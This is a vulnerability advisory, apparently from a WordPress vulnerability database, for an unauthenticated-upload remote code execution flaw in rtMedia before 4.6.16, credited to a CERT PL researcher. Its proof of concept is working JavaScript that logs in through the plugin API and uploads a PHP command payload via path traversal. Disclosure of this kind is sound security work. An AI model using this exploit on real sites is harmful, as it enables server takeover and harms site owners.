WordPress Plugin Vulnerabilities
rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE
Description
The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server
Proof of Concept
If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After enabling the API in settings and installing buddypress, run the following code, replacing the username, password, and server path as needed. fetch("/wp-admin/admin-ajax.php?action=rtmedia_api", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "method=wp_login&username=USERNAME&password=PASSWORD", "method": "POST", }).then((response) => { return response.json(); }).then((data) => { const formData = new FormData() formData.append('rtmedia_file', btoa('<?php system("ps"); ?>')); formData.append('method', 'rtmedia_upload_media'); formData.append('image_type', './../../../../../var/www/html/wp-content/rce.php'); formData.append('title', '../'); formData.append('token', data.data.access_token); fetch('/wp-admin/admin-ajax.php?action=rtmedia_api', { method: 'POST', body: formData }); });
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-29 (about 5 months ago)
Added
2023-11-29 (about 5 months ago)
Last Updated
2023-11-29 (about 5 months ago)